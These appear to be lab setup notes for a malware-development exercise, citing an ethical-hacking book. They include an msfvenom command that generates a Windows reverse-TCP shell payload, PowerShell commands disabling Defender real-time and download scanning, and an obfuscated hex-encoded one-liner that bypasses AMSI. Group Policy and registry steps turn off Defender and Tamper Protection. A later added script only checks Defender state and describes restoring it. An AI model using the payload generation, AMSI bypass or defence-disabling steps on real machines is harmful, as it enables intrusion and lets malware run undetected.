- Process Hacker
- Kali VM
- Windows 11 or 10 VM
- Parrot
You might need to generate the payload in Kali:

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP_ADDR> LPORT=4444 -f c
```

Windows 10 or lower should be fine after this step, but if you are testing on Windows 11 or later, I recommend going through steps 2 and 3 as well.
Run the following in an elevated PowerShell to turn off Defender's IOAV (downloaded-file) scanning and real-time monitoring:

```powershell
# Disable scanning of downloaded files/attachments and real-time monitoring
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true

# PowerShell one-liner from the original notes (run in the same elevated session)
[Ref].Assembly.GetType('System.Management.Automation.'+$("41 6D 73 69 55 74 69 6C 73".Split(" ")|forEach{[char]([convert]::toint16($_,16))}|forEach{$result=$result+$_};$result)).GetField($("61 6D 73 69 49 6E 69 74 46 61 69 6C 65 64".Split(" ")|forEach{[char]([convert]::toint16($_,16))}|forEach{$result2=$result2+$_};$result2),'NonPublic,Static').SetValue($null,$true)
```

Group Policy (WIN + R, then `gpedit.msc`):

- In the Group Policy Editor, go to Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus.
- Navigate to Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Tamper Protection.
- Enable the policy named Turn off Tamper Protection.
- Find the policy named Turn off Microsoft Defender Antivirus.
- Double-click it, set it to Enabled, and then click Apply and OK.
- Go to Real-time Protection under the Microsoft Defender Antivirus settings.
Registry (WIN + R, then `regedit`): go to `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender` and set the following values:

- DisableAntiSpyware = 1
- DisableRoutinelyTakingAction = 1
- ServiceStartStates = 4
Start an elevated PowerShell, or an elevated command prompt from PowerShell:

```powershell
# Elevated PowerShell
Start-Process powershell -Verb runAs

# Elevated command prompt
powershell -Command "Start-Process cmd -Verb RunAs"
```
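Before running a test (and again when the lab is finished) it is worth confirming which of the settings changed by the steps above are actually in effect, since Windows 11 ignores some of them while tamper protection is on. The script below is an added example, not part of the original notes; it assumes the Defender cmdlets `Get-MpComputerStatus` and `Get-MpPreference` are available (the Defender feature is still installed) and that it is run from an elevated PowerShell. The function name `Get-DefenderLabState` is my own.

```powershell
# Added example (not from the original notes): report the Defender state that the
# Set-MpPreference, Group Policy and registry steps change, so the VM can be checked
# before a test and confirmed restored afterwards. Run from an elevated PowerShell.
# Assumes the Defender cmdlets are present (Defender feature still installed).

# Registry policy path from the notes
$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'

function Get-DefenderLabState {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference
    # $null when the policy key has not been created yet
    $policy = if (Test-Path $policyKey) { Get-ItemProperty -Path $policyKey } else { $null }

    [pscustomobject]@{
        # Live engine state reported by Defender
        AntivirusEnabled             = $status.AntivirusEnabled
        AMServiceEnabled             = $status.AMServiceEnabled
        RealTimeProtectionEnabled    = $status.RealTimeProtectionEnabled
        IsTamperProtected            = $status.IsTamperProtected
        # Preferences set with Set-MpPreference above
        DisableRealtimeMonitoring    = $pref.DisableRealtimeMonitoring
        DisableIOAVProtection        = $pref.DisableIOAVProtection
        # Registry policy values from the notes ($null means not set)
        DisableAntiSpyware           = $policy.DisableAntiSpyware
        DisableRoutinelyTakingAction = $policy.DisableRoutinelyTakingAction
        ServiceStartStates           = $policy.ServiceStartStates
    }
}

# Show the full picture
$state = Get-DefenderLabState
$state | Format-List

# Tamper protection silently reverts the Set-MpPreference and registry changes on
# Windows 11, so flag it explicitly; after the lab the warning should be the expected result.
if ($state.IsTamperProtected) {
    Write-Warning 'Tamper protection is still on; Set-MpPreference/registry changes will be reverted.'
} elseif ($state.RealTimeProtectionEnabled) {
    Write-Warning 'Real-time protection is still enabled.'
} else {
    Write-Host 'Defender real-time protection is off (lab state).'
}
```

To put the VM back, run the same `Set-MpPreference` switches with `$false`, set the two Group Policy entries back to Not Configured, delete the three registry values and reboot, then run the script again and confirm `RealTimeProtectionEnabled` and `IsTamperProtected` are both `True`.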
- Most of the code is from Malware Development for Ethical Hackers by Zhassulan Zhussupov, 2024.
- cocomelonc (Zhassulan Zhussupov) (2021) https://cocomelonc.github.io/ (blog).
- DLL Hijacking Basics by Enes Adışen, 2023.